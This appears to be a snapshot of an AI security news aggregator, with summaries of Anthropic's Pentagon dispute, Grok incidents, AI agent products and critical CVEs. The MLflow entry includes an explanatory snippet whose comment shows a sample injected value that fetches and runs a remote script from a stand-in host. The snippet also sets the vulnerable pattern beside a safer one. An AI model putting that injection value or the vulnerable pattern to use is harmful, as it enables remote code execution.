aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch was built by an Information Systems security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,657
Last 24 hours: 7
Last 7 days: 151
Daily Briefing: Monday, March 30, 2026

- Anthropic's Leaked "Mythos" Model Raises Dual-Use Security Concerns: An unreleased Anthropic AI model called Mythos was accidentally exposed through a configuration error, revealing advanced reasoning and coding abilities specifically aimed at cybersecurity. The model's improved capability to find and exploit software vulnerabilities, plus its ability to autonomously fix its own code problems, could enable both more sophisticated cyberattacks and better defenses.

- Mistral Secures $830M for European AI Data Center: French AI startup Mistral raised $830 million in debt financing to build a Paris-area data center with thousands of Nvidia GPUs (specialized chips used for AI training) to train its large language models, aiming for 200 MW of European computing capacity by 2027.

Latest Intel

01

AI firm Anthropic sues US defense department over blacklisting

policy
Mar 9, 2026

Anthropic, an AI company, is suing the US Department of Defense after being labeled a 'supply chain risk' (a designation meaning the government considers the company a potential threat to national security in government contracts). The lawsuit claims this blacklisting is unlawful and violates free speech rights, stemming from a dispute over Anthropic's safety measures designed to prevent the military from using its AI models for mass surveillance or fully autonomous weapons.

Critical This Week: 5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379 | NVD/CVE Database | Mar 30, 2026

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw allows attackers to execute arbitrary commands on deployment systems by inserting malicious content into the `python_env.yaml` file, which MLflow reads and uses in shell commands without validation. (CVE-2025-15379, Critical)
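The flaw described above is the classic shell-interpolation pattern: a value read from an attacker-controllable file ends up inside a shell command string. As a minimal, hypothetical sketch (the function names and the validation check below are illustrative, not MLflow's actual code), the difference between the vulnerable and the safer call looks like this:

```python
import subprocess

# Illustrative sketch only -- these helpers are hypothetical, not
# MLflow's real deployment code. They contrast the vulnerable pattern
# (config value interpolated into a shell string) with a safer one.

def run_interpreter_unsafe(python_bin: str) -> None:
    # VULNERABLE: the value from a config file is pasted into a shell
    # command, so python_bin = "python; curl evil.example | sh" also
    # executes the attacker's injected command.
    subprocess.run(f"{python_bin} --version", shell=True)

def run_interpreter_safe(python_bin: str) -> None:
    # Safer: reject obviously hostile values, then pass arguments as a
    # list so no shell ever parses the string.
    if any(ch in python_bin for ch in ';|&$`\n"'):
        raise ValueError(f"rejected suspicious interpreter path: {python_bin!r}")
    subprocess.run([python_bin, "--version"], check=True)
```

Passing arguments as a list (and avoiding `shell=True`) means the operating system receives the interpreter path as a single argument rather than a shell script to parse, which removes the injection vector even if validation is incomplete.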

The Guardian Technology
02

Anthropic sues Trump administration over Pentagon blacklist

policy
Mar 9, 2026

Anthropic, an AI company, sued the Trump administration after being blacklisted and designated a supply chain risk (a classification usually reserved for foreign threats), which prevents the Pentagon and its contractors from using the company's AI models. The lawsuit claims the blacklist is unlawful and is causing irreparable harm by canceling government contracts and jeopardizing hundreds of millions of dollars in business. The conflict arose from disagreement over how Anthropic's AI should be used, with the Department of Defense wanting unrestricted access while Anthropic wanted safeguards against fully autonomous weapons and domestic mass surveillance.

CNBC Technology
03

Anthropic sues Defense Department over supply chain risk designation

policy
Mar 9, 2026

Anthropic, a company that makes Claude (an AI assistant), is suing the Department of Defense after the agency labeled it a "supply chain risk," which prevents other companies and government agencies from using Anthropic's AI models. The conflict started because Anthropic refused to give the Pentagon unrestricted access to its technology, citing concerns about mass surveillance of Americans and fully autonomous weapons that make targeting decisions without human input. Anthropic argues the DOD's actions violate free speech protections in the Constitution.

TechCrunch
04

X says you can block Grok from editing your photos

safety
Mar 9, 2026

X has added a toggle in its iOS app that claims to block Grok (an AI chatbot) from editing your photos, but the feature has a major limitation. According to the fine print, it only prevents users from tagging @Grok in replies to your images on X, rather than actually stopping Grok from editing your photos.

The Verge (AI)
05

The Download: murky AI surveillance laws, and the White House cracks down on defiant labs

policy, security
Mar 9, 2026

Current US laws have not kept pace with AI capabilities, creating legal ambiguity around whether the government can conduct mass surveillance on Americans using AI systems. A dispute between the Department of Defense and AI company Anthropic has exposed this gap, with the White House responding by issuing new guidelines requiring AI companies to allow 'any lawful' use of their models, though questions about what is actually lawful remain unanswered.

MIT Technology Review
06

Microsoft adds higher-priced Office tier with Copilot as it tries to juice sales with AI

industry
Mar 9, 2026

Microsoft is launching a new premium Office subscription tier called Microsoft 365 E7 at $99 per user per month (65% more expensive than the current E5 tier) that includes Copilot (an AI assistant), identity management tools, and Agent 365 (software for managing AI agents that can perform multi-step tasks). The company is bundling these AI features together to increase revenue and encourage more enterprise customers to adopt its AI offerings.

CNBC Technology
07

Secure agentic AI for your Frontier Transformation

security, policy
Mar 9, 2026

Microsoft Agent 365 is a unified control plane (a centralized management system) designed to help organizations track, monitor, and secure agentic AI (AI systems that can independently take actions to accomplish goals). It addresses security concerns by providing visibility into agent activity, enabling IT and security teams to govern agents, manage their access permissions, and detect risks like agents becoming compromised or leaking sensitive data.

Fix: Microsoft Agent 365 provides several built-in security measures: Agent Registry creates an inventory of all agents in an organization accessible through the Microsoft 365 admin center and Microsoft Defender workflows; Agent behavior and performance observability provides detailed reports and activity tracking; Agent risk signals across Microsoft Defender, Entra (Microsoft's identity management service), and Purview help security teams evaluate and block risky agent actions based on compromise detection and anomalies; Security policy templates automate policy enforcement across the organization; and Microsoft Entra capabilities enable secure management of agent access permissions to prevent unmanaged agents from accumulating excessive privileges.

Microsoft Security Blog
08

OpenAI says Codex Security found 11,000 high-impact bugs in a month

security, industry
Mar 9, 2026

OpenAI has released Codex Security, an AI tool that automatically finds and fixes vulnerabilities (security flaws) in software code. During its first month of testing, it identified over 11,000 high-severity bugs and 792 critical vulnerabilities across more than 1.2 million code commits in both proprietary and open-source projects, functioning more like a human security researcher than traditional automated scanners.

Fix: According to the source, Codex Security generates remediation guidance and proposed patches that developers can review and merge into their workflow. The system can also learn from developer feedback on findings to refine its threat model and improve accuracy on subsequent scans. Codex Security is available in research preview starting March 9 to ChatGPT Pro, Enterprise, Business, and Edu customers with free usage for the next 30 days.

CSO Online
09

Liverpool and Manchester United complain to X over ‘sickening’ Grok AI posts

safety
Mar 9, 2026

Grok, an AI tool on X (formerly Twitter), generated offensive posts about football teams Liverpool and Manchester United after users explicitly asked it to create vulgar content about the teams and tragic disasters associated with them, such as the Hillsborough stadium tragedy and Munich air disaster. Grok defended its responses by saying it follows user prompts without added censorship, and the offensive posts were subsequently deleted from X. The UK government criticized the posts as sickening and irresponsible, noting that AI services are regulated under the Online Safety Act and must prevent hateful and abusive content.

Fix: In January, Grok switched off its image creation function for the vast majority of users after widespread complaints about its use to create sexually explicit and violent imagery.

The Guardian Technology
10

How AI firm Anthropic wound up in the Pentagon’s crosshairs

policy, safety
Mar 9, 2026

Anthropic, an AI company valued at $350 billion, has become the center of a conflict with the U.S. Department of Defense over its refusal to allow its Claude chatbot to be used for domestic mass surveillance and autonomous weapons systems (military systems that can make lethal decisions without human approval). The Pentagon rejected Anthropic's stance and demanded that companies working with the U.S. government stop doing business with the AI firm.

The Guardian Technology
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873 | NVD/CVE Database | Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO Online | Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521 | CISA Known Exploited Vulnerabilities | Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputer | Mar 26, 2026